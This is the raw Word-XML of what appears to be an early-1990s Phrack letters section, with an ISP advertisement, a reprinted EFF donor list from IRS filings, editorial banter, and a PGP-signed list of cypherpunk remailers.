    <w:p w14:paraId="3B69021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Internet connectivity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46815B6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D849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is a system for professionals in both the Internet and Unix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F3A75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The public image is important to us. Illegal activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62666C9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tolerated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E61F15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39D4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has every feature you could possibly need.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1466438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9607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is lightly loaded, extremely reliable and dedicated to providing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E37A26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time 24 hour Internet access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175F3BF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B483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Support: 24 hour emergency response service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695D701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3137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Dialups: Palo Alto area, High Speed (V.32 and PEP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2E19D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218A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Accounts: $20 monthly ( with file storage capacity of 5 megabytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F97DC4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AC9C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$1 per megabyte per month over 5 megabytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4B379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0C8C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Commercial Accounts: $40 monthly (file storage capacity of 10 megabytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0843CFE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$1 per megabyte per month over 10 megabytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8C186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008F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Newsfeeds: We offer both nntp and uucp based newsfeeds , with all domestic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B3FF3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newsgroups, and including all foreign newsgroups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01537A0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D91E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SPECIAL FEATURES THAT NO ONE ELSE CAN PROVIDE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E53DEB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482C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Satellite Weather: Netsys has available real time satellite weather</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0669D3C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imagery. Images are available in gif, or Sun raster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EE37B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format. Contact us for NFS mirroring, and other special</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DC005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arrangement. These images are directly downlinked from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5006889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the GOES bird. Contact Steve Eigsti (steve@netsys.com)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B2C1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4F26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Satellite Usenet: Netsys is offering Pagesat's satellite newsfeed service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F43BB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40E0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for large volume news distribution. Members of Netsys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBB435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can obtain substantial discounts for the purchase and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1332C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service costs of this revolutionary method of Usenet news</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7190C64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distribution.  Both Unix and MS Windows software available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A13698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Contact (pagesat@pagesat.com) for product information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C47B3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7F40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Paging Services: Netsys is offering Pagesat's Internet to Pager mail service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251889F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Members of Netsys can obtain critical email to pager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39721DD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services. Pagesat has the ability to gateway any critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EF17F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electronic mail to your display pager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147769A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D60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Leased Line Internet Connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214AAFE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A9B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Pagesat Inc. offers low cost 56k and T1 Internet connections all over the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E33469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United States. Since Pagesat is an FCC common carrier, our savings on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2027BBE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leased lines can be passed on to you. For further information, contact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5FD3A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Duane Dubay (djd@pagesat.com).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A48500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27DD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offer other services such as creating domains, acting as MX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1311CF5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forwarders, and of course uucp based newsfeeds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4CCF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A85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is now offering completely open shell access to Internet users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526741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accounts, or more information , send mail to netsys@netsys.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5B816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0BF0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will NEVER accept more members than our capacity to serve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212D9BF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4B7D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Netsys prides itself on it's excellent connectivity (including multiple T1's,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECD383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SMDS), lightly loaded systems, and it's clientele.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F1E3D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F0E8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not your average Internet Service Provider. And it shows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479DB6F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08823FF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We here at Phrack are forever in debt to Mr. Len Rose for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DB91D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allowing us to use ftp.netsys.com as our new official FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D777D3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site after getting the boot off EFF.  It takes a steel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0A733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set of huevos to let such an evil hacker publication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F35B4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reside on your hard drive after serving time for having</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E01792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dealings with evil hackers.  We are STOKED!  Thanks Len!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2991963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Netsys is not your average site, INDEED!]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513CE65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E7FF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4C5EE13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302A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Something Phrack might like to see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBA7EC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FD4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The contributors to and practices of the Electronic Frontier Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABAEF9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disclose quite accurately, just who this organization represents.  We</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50871D9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challenge the legitimacy of the claim that this is a "public interest"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A88307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advocate.  Here is a copy of their list of contributors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B7CE3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F32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[FINS requested the Office of the Attorney General of the Commonwealth of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFAEBF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Massachusetts to provide us with a list of contributors of over $5000, to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583BDC5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the Electronic Frontier Foundation, required by IRS Form 990.  Timothy E.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7FEB1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Dowd, of the Division of Public Charities, provided us with a list (dated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4569A44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January 21, 1993), containing the following information.  No response was</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CFD4A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given to a phone request by FINS directly to EFF, for permission to inspect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401D6EC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and copy the most current IRS Form 990 information.]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44304C1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32A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5DFC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7CB6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ELECTRONIC FRONTIER FOUNDATION, INC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C43525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IRS FORM 990. PART I - LIST OF CONTRIBUTIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBB7DB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3D89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7CD6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NAME AND ADDRESS OF CONTRIBUTOR       CONTRIBUTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3000A28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DATE      AMOUNT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23678C9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8CF7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Kapor Family Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598B45C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Kapor Enterprises, Inc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F006BF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155 2nd Street</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3B7F1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Cambridge, MA 02141                Var       100,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B872EF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231A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Mitchell D. Kapor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D848D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450 Warren Street</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726EF9C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Brookline, MA 02146                Var       324,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2672394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CA3A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Andrew Hertzfeld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEDFF8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370 Channing Avenue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676FAB3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Palo Alto, CA 94301                12/12/91    5,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42073A8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D7B6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3EBE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Dunn &amp; Bradstreet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318D82F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Michael F. ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE6F2B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1001 G Street, NW Suite 300 East</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FAF36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Washington, DC 20001               02/12/92   10,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5059BAB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C228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National Cable Television</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A60D3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1724 Massachusetts Avenue, NW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6755748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Washington, DC 20036               02/18/92   25,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5463795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3D2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8CFC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MCI Communications Corporation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E821B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1133 19th Street, NW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68635A0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Washington, DC 20036               03/11/92   15,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4682915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FAB8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American Newspaper Publishers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66340E7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Association</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761CD74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The Newspaper CTR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7CBBE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11600 Sunrise Valley</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4079F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Reston, VA 22091                   03/23/92   20,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43948AD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E5EB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Apple Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA3CCA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20525 Mariani Avenue MS:75-61</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EECB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Cupertino, CA 95014                03/23/92   50,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF0AE4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9C91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Sun Microsystems, Inc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E84F45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Wayne Rosing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9D834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2550 Garcia Ave</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC2B31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Mountain View, CA 94043-1100       04/03/92   50,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5DEAF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D30D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Adobe Systems, Inc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1916CF9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c/o William Spaller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B27A66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1585 Charlestown Road</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B26CA1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Mountain View, CA 94039-7900       04/16/92   10,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2432B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B810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International Business Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0952F4C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Robert Carbert, Rte 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E85C92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Somers, NY 10589                   05/07/92   50,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D82492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D96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Prodigy Services Company</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D653B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G. Pera...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7457156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445 Hamilton Avenue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDC328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White Plains, NY 10601             05/07/92   10,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598B74D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DD8A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Electronic Mail Associates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3D979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1555 Wilson Blvd. Suite 300</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ED980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Arlington, VA 22209                05/13/92   10,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ED4CE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B50D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Microsoft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4A3B8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William H. Neukom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DA6C9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 Microsoft Way</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B844E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Redmond, VA 98052                  06/25/92   50,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD74F5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AF01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David Winer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AA043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933 Hermosa Way</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436F911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Menio Park, CA 94025               01/02/92    5,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1EB9B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6589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Ed Venture Holdings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F41C04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Ester Dvson</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687902A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375 Park Avenue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0566E13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New York, NY 10152                 03/23/92   15,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DA9EB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7EB5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Anonymous                          12/26/91   10,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DC0AB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3414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Bauman Fund</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163D23E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Patricia Bauman</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429640C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1731 Connecticut Avenue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194034E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Washington, DC 20009-1146          04/16/92    2,500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F39C87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BB16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Capital Cities ABA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F619D2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Mark MacCarthy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED6A7D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2445 N. Street, NW Suite 48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF12E9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Washington, DC 20037               05/04/92    1,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E94D74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4A8C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John Gilmore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669B7AC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210 Clayton Street</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C350F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San Francisco, CA 94117            07/23/91    1,488</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6105A73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08/06/91  100,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ECA52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8772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Government Technology              10/08/91    1,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B50C10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B096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Miscellaneous                      04/03/91      120</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0674BF9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5B68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Apple Writers Grant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529924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c/o Apple Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5823B84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20525 Mariani Avenue               01/10/92    15,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D62916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0188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A725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Well, hmmm.  Tell you guys what:  Send Phrack that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB0AE4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much money and we will give up our ideals and move to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671B72C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 new location, and forget everything about what we</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230EF5C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were all about in the beginning.  In fact, we will turn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF71FE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our backs on it.  Fair?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168F56C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1E2A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 was talking about me moving to Europe and giving</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27619F0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 computers.  Don't read anything else into that.  Nope.]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671F82E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D8ED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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8DAD6A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2972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-----BEGIN PGP SIGNED MESSAGE-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD45E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F722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Q1: What cypherpunk remailers exist?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AA333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B3C3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A1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC1DA3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DD185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 hh@pmantis.berkeley.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BB84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 hh@cicada.berkeley.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE0A4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 hh@soda.berkeley.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411D276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 nowhere@bsu-cs.bsu.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167C6E9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 remail@tamsun.tamu.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAC1D4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6: remail@tamaix.tamu.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEB247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7: ebrandt@jarthur.claremont.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E40CD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8: hal@alumni.caltech.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CD020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9: remailer@rebma.mn.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D468D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10: elee7h5@rosebud.ee.uh.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C5E75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11: phantom@mead.u.washington.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A484D58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12: hfinney@shell.portal.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CBFBE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13: remailer@utter.dis.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668C1CC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14: 00x@uclink.berkeley.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2838867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15: remail@extropia.wimsey.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8B45F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F50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14:paraId="77AD83A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#1-#6  remail only, no encryption of headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A19E8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#7-#12  support encrypted headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114A6AB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#15  special - header and message must be encrypted together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEDD77B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#9,#13,#15 introduce larger than average delay (not direct connect)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35708F6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#14  public key not yet released</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3B51A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7E2E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#9,#13,#15      running on privately owned machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7987DDE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9C78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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B487EC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37D9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Q2: What help is available?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D64FA2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D2872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A2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0065707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736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Check out the pub/cypherpunks directory at soda.berkeley.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0187D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(128.32.149.19).  Instructions on how to use the remailers are in the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C5E3C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remailer directory, along with some unix scripts and dos batch files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC12A5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2BAB4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Mail to me (elee9sf@menudo.uh.edu) for further help and/or questions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2041567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F1396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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BF1AB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195C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CF52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-----BEGIN PGP SIGNATURE-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A6840E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Version: 2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5924FCA7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D7E4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iQCVAgUBLAulOYOA7OpLWtYzAQHLfQP/XDSipOUPctZnqjjTq7+665MWgysE1ex9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E1CA3F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lh3Umzk2Q647KyqhoCo8f7nVrieAZxK0HjRFrRQnQCwjTSQrve2eAQ1A5PmJjyiI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1618C11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Y55E3YIXYmKrQekIHUKaMyATfnhNc6+2MT8mwaWz2ki</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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OTRkun/SlNI3Cv3Qt8Emy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB50A11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Y6Zv0kk/7rs=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124FFF2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=simY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FD226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-----END PGP SIGNATURE-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071CFCEC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F8BC0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>[Editor:  We suggest that everyone go ahead and get the info file from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B41306D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soda.berkeley.edu's ftp site.  While you are there,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEB79D3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take a look around.  Lots of groovy free stuff.]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAD5E49" w14:textId="77777777" w:rsidR="00717DEF" w:rsidRPr="00717DEF" w:rsidRDefault="00717DEF" w:rsidP="0071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913885" w14:textId="77777777" w:rsidR="00717DEF" w:rsidRPr="00717DEF" w:rsidRDefault="00717DEF" w:rsidP="00717DEF">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00717DEF" w:rsidRPr="00717DEF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40"/>
    <w:rsid w:val="002354EC"/>
    <w:rsid w:val="002F4E40"/>
    <w:rsid w:val="004E6F4C"/>
    <w:rsid w:val="005421D2"/>
    <w:rsid w:val="0071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FC2D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BB72035C-28C8-448D-84D1-252A714B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7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5546</Words>
  <Characters>31613</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>263</Lines>
  <Paragraphs>74</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>37085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2021-01-30T10:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-30T10:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>